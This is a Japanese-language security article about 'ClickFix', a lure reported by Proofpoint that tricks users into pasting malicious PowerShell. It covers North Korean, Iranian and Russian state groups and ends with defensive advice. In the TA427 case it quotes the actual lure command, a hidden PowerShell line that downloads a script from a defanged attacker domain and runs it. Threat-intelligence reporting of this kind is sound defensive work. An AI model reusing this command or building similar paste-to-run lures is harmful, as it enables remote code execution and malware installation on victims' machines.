2025年初頭、セキュリティ企業Proofpointが報告した調査によると、北朝鮮、イラン、ロシアの国家支援型攻撃者たちが、新たなソーシャルエンジニアリング 手法「ClickFix」を採用していたことが明らかになりました。この手法はもともとサイバー犯罪者によって使用されていたもので、感染チェーンの中でユーザー自らに悪意あるPowerShellコマンドを実行させるという新たなアプローチです。
目次
ClickFixとは?
ClickFixは、偽のエラーメッセージやポップアップウィンドウを用いて、利用者に手動でコマンドをコピー&ペーストさせることで、マルウェアを実行させる技術です。
見た目にはOSからの正規の指示のように見せかける点が特徴で、フィッシングの中でも極めて巧妙な“対話型”の誘導型攻撃と位置付けられます。
この手法は2024年にサイバー犯罪者集団「TA571」などによって使用されはじめ、短期間でさまざまな犯罪活動へ広まりました。そして2024年末から2025年初頭にかけて、北朝鮮・イラン・ロシアの国家支援アクターまでもがこの手法を模倣し、自国のスパイ活動に組み込んでいたことが明らかになりました。
北朝鮮:TA427の事例
TA427(別名:Kimsuky)は、2025年1月から2月にかけて、日米韓の外交関係者を装った攻撃メールを複数送信。偽の「アンバサダーからの手紙」などの添付PDFファイル内に悪意あるリンクを仕込み、クリック後に誘導されたページで「登録コード」の名目でPowerShellコマンドをユーザーに実行させる方式を採用していました。
このコマンドは複数のステップを経て、最終的にQuasarRATというリモートアクセス型マルウェアを展開。さらに定期的にVBSスクリプトを実行するタスクスケジューラも作成され、持続的な侵入が可能となっていました。
日本の外交官になりすましたメールを配信
2025年2月、TA427のオペレーターは日本の外交官になりすまし、ワシントンD.C.の大使館で駐米大使 山田重夫大使との面会を手配するよう依頼するメールを送信した。
このメールは[日本大使館] 面会依頼という件名で、添付ファイルは韓国の駐米大使 趙鉉東(チョン・ヒョンドン)の手紙という「無害」なファイルでした。
初回のメールは一切有害な活動はされません。
日本の外交官になりすましメールを配信
フィッシングページへ誘導:悪意のあるリンク付き添付ファイル
その後、攻撃者は標的の個人用メールアカウントと業務用メールアカウントの両方に連絡を取り、悪意のあるメールを送信しました。
攻撃者からの電子メールの返信には、タイトルにターゲットの名前を使用した PDF 添付ファイルが含まれていました。
フィッシングページへ誘導:PDFにセキュアなファイル保存サービスと明記し、フィッシングページへ誘導
メールに添付されていたPDF には、セキュア ドライブであると主張するダイナミック DNS ドメインのサブドメインを使用したランディング ページへのリンクが含まれていました。
フィッシングページでPDFをダウンロードしようとすると・・・
ランディング ページには、Questionnaire.pdf という偽の PDF ファイルがホストされていました。
偽のPDFをダウンロードしようとすると、別のページにリダイレクトされ、ポップアップアラートが表示され、文書を閲覧するには登録が必要だと案内されます。
ユーザー登録を促し、コードをコピーアンドペーストで実行させようとする
デバイス登録を選択するとユーザーが登録ボタンをクリックすると、以下に示すように、登録方法の指示とともにコードの入力を求める別のポップアップが表示されます。
PowerShell のコマンドを実行させる:ClickFix
デバイス登録にはコード実行を促す注意文とコード実行の依頼が表示されます
コードは以下のようなPowerShell コマンドを含むレジスタ コードを手動でコピーして貼り付け、ターミナルで実行する必要があります。
powershell -windowstyle hidden -Command iwr
"hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile
"$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex
$c;
3Z5TY-76FR3-9G87H-7ZC56
リモートでホストされている2つ目のPowerShellコマンドを取得して実行し、攻撃チェーンの前半で参照されたおとりPDF(Questionnaire.pdf)をユーザーに表示しました。この文書は日本の外務省を装い、核拡散と北東アジアにおける政策に関する質問が掲載されていました。
2つ目のPowerShellスクリプトは、Update-out-of-date-20240324001883765674というスケジュールタスクによって19分ごとに実行される、temp.vbsというVBSスクリプトを作成しました。
また、20分ごとにVBSスクリプトを実行するUpdate-out-of-date-20240324001883765675という2つ目のスケジュールタスクも作成されましたが、このVBSスクリプトは存在せず、タスクの目的は不明です。
複数のステップを経て、最終的にQuasarRATというリモートアクセス型マルウェアを展開。さらに定期的にVBSスクリプトを実行するタスクスケジューラも作成され、持続的な侵入が可能となっていました。
イラン:TA450の事例
2024年11月、イランの攻撃グループTA450(別名:MuddyWater)は、Microsoftを装う英語のフィッシングメールを中東諸国に送信。メール本文に含まれた手順に従わせることで、管理者権限でのPowerShell実行とリモート管理ツール(Level RMM)のインストールを促しました。
これにより、攻撃者は対象の端末に不正アクセスし、情報収集やデータ流出を行うことが可能となります。攻撃対象には、金融・政府機関が多く含まれていました。
ロシア:UNK_RemoteRogueとTA422の事例
ロシアでは、2つのグループがClickFixを利用していました。
-
UNK_RemoteRogueは、2024年12月に防衛関連企業を標的にした攻撃で、Zimbraメールサーバを中継インフラとして悪用し、偽のMicrosoft Word風ページでClickFixを実装。最終的にEmpire C2を介したPowerShellコードが実行されました。
-
TA422(APT28)は、2024年10月にGoogleスプレッドシートを装ったフィッシングメールを使用し、reCAPTCHA画面のあとにSSHトンネルを開くPowerShellコマンドを表示するという高度なClickFix手法を確認されています。
ClickFixは今後どうなるのか?
現在のところ、ClickFixは一部の国家支援グループで限定的に確認されており、攻撃成功率や定着度はまだ評価の途上にあります。しかしProofpointは、ClickFixが国家レベルの攻撃者によって“試験運用”されている段階である可能性が高く、今後さらに洗練されていくと警告しています。
特に注目すべきは、各国の攻撃者がほぼ同時期にClickFixを採用している点であり、これまでのマルウェア技術の共有・模倣の傾向からも、より広範な採用が予測されます。
日本企業への示唆
ClickFixは、「ユーザーが自ら手を動かして感染させる」という性質上、従来型のウイルス検知では防ぎにくいのが難点です。国内企業にとっても、以下のような対策が急務となります:
-
PowerShellの利用制限:スクリプト実行ポリシーの制御とログ監視
-
ユーザー教育の強化:手動でのコード入力を要求する画面に対する警戒感を養う
-
フィッシング対策の徹底:ドメインチェック、メールフィルタの強化
-
RMMツールの使用状況の棚卸:不審な遠隔管理ソフトの検出と無効化
まとめ
ClickFixは一見すると地味な手法ですが、ユーザーの行動心理に付け入る極めて巧妙な技術です。今後、これが日本国内でも応用される可能性は高く、技術的対策だけでなく、「ユーザーに実行させない」ための仕組み作りが求められます。
Proofpointの観測によれば、今後もTA427をはじめとする攻撃者たちがClickFixを進化させていく可能性が高く、情報システム部門としては早期の対応準備が重要です。
関連記事
偽のグーグル クロームのエラーで悪意のあるPowerShellを実行させるよう誘導-ClickFixによるソーシャルエンジニアリング
ハッカーがPHPの脆弱性を悪用し、日本を標的にサイバー攻撃を実行(CVE-2024-4577)
6000以上のワードプレスがサイバー攻撃とハッキングの被害
ランサムウェア 攻撃 グループが Google Chrome に保存されたパスワードを盗む
Notionの危険性と情報漏洩しない為の対策
TikTokの危険性を解説
セキュリティインシデント 事例【2024年】
サイバー攻撃集団 ロックビット(LockBit)とは?
中国のハッカーが世界中にサイバー攻撃 Coathanger(コートハンガー)で2万台のFortiGateへ侵入
